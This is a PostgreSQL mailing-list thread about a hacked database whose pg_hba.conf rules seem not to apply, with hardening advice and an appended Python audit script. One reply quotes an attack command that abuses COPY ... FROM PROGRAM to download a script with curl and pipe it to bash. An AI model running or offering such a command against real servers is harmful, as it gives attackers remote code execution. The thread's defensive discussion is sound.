> Have checked select * from pg_hba_file_rules results are consistent with pg_hba.conf
> any ip and user still can login in db

Any proxy? port/ip - forwarding running in the background?
in the next time check the "client_addr".
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null ;

> a Postgres DB that was Hacked l
> When I remove pg software and reinstall pg software

I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )

Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.
https://dev.to/sanchitsharma/investigation-into-postgres-malware-hack-2ai0 (2020.Mar )
https://brycematheson.io/how-to-permanently-kill-and-remove-kdevtmpfsi-kinsing/

> host VJ VJ_USER 10.10.10.1/32 md5

imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html
  ( and use a firewall - for closing all external ports or use SSL )

Regards,
 Imre

shing dong <s7eqs...@gmail.com> wrote (on Thu, Dec 23, 2021, 11:15):

> Your original post stated that you only had
>> host VJ VJ_USER 10.10.10.1/32 md5
>> in the pg_hba.conf file.
>> However the result of the select is considerably more ?
>
> DEAR
>
> I have tested this feature , only had
>
> host VJ VJ_USER 10.10.10.1/32 md5
>
> in the pg_hba.conf file
>
> Have checked select * from pg_hba_file_rules results are consistent with
> pg_hba.conf
>
> any ip and user still can login in db
>
> When I remove pg software and reinstall pg software , the function of
> pg_hba is working ,represent that the location and content of
> pg_hba.conf are correct
>
> Suspect that the function of pg_hba is destroyed?
>
> Dave Cramer <davecramer@postgres.rocks> wrote on Wed, Dec 22, 2021 at 6:58 PM:
>
>> On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs...@gmail.com> wrote:
>>
>>> *Dear Dave *
>>>
>>> The result after reload is
>>>
>>> 2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""
>>>
>>> No other error message
>>>
>>> ------------------------------------------
>>>
>>> result of select * from pg_hba_file_rules
>>>
>>
>> Hmmm for some reason I did not reply to the list.
>>
>> At any rate.
>>
>> Your original post stated that you only had
>>
>> host VJ VJ_USER 10.10.10.1/32 md5
>>
>> in the pg_hba.conf file.
>>
>> However the result of the select is considerably more ?
>>
>> Dave Cramer
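
The mismatch raised in this thread, between the one-line pg_hba.conf and a much longer pg_hba_file_rules result, can be checked mechanically; the script below is an added example, not code from any poster. It assumes a CSV export of the view and rules that use IP addresses only; the sample view rows, the `appdb`/`app_ro`/`app_rw` names and all function names are constructed for illustration.

```python
import csv, io, ipaddress

WEAK = {"trust", "password", "md5"}  # thread advice: move md5 to scram-sha-256

def _expand(kind, dbs, users, net, method):
    # One tuple per database/user pair so comma lists compare equal on both sides.
    return {(kind, d, u, net, method) for d in dbs.split(",") for u in users.split(",")}

def parse_hba_conf(text):
    """Rules in pg_hba.conf text (assumes IP addresses, no hostnames or keywords)."""
    rules = set()
    for raw in text.splitlines():
        f = raw.split("#", 1)[0].split()
        if not f:
            continue
        if f[0] == "local":                # local DB USER METHOD
            rules |= _expand("local", f[1], f[2], None, f[3])
        elif "/" in f[3]:                  # host DB USER ADDR/LEN METHOD
            rules |= _expand(f[0], f[1], f[2], ipaddress.ip_network(f[3], strict=False), f[4])
        else:                              # host DB USER ADDR NETMASK METHOD
            net = ipaddress.ip_network(f"{f[3]}/{f[4]}", strict=False)
            rules |= _expand(f[0], f[1], f[2], net, f[5])
    return rules

def parse_view_csv(text):
    """Rules from a CSV export of SELECT * FROM pg_hba_file_rules."""
    rules = set()
    for r in csv.DictReader(io.StringIO(text)):
        net = ipaddress.ip_network(f"{r['address']}/{r['netmask']}", strict=False) if r["address"] else None
        rules |= _expand(r["type"], r["database"].strip("{}"), r["user_name"].strip("{}"), net, r["auth_method"])
    return rules

def audit(conf_text, view_csv):
    edited, reported = parse_hba_conf(conf_text), parse_view_csv(view_csv)
    return {"only_in_view": sorted(reported - edited, key=str),
            "only_in_file": sorted(edited - reported, key=str),
            "weak_auth": sorted((r for r in reported if r[4] in WEAK), key=str)}

# Constructed sample: the single rule quoted in the thread, and a made-up view export.
CONF = "host VJ VJ_USER 10.10.10.1/32 md5\n"
VIEW = """\
line_number,type,database,user_name,address,netmask,auth_method,options,error
1,local,{all},{all},,,md5,,
2,host,{VJ},{VJ_USER},10.10.10.1,255.255.255.255,md5,,
3,host,{appdb},"{app_ro,app_rw}",192.0.2.10,255.255.255.255,scram-sha-256,,
"""

if __name__ == "__main__":
    for name, rows in audit(CONF, VIEW).items():
        print(name, len(rows), *rows, sep="\n  ")
```

Any entry under `only_in_view` means the server is reading a different file from the one that was edited; `SHOW hba_file;` gives the path it actually uses.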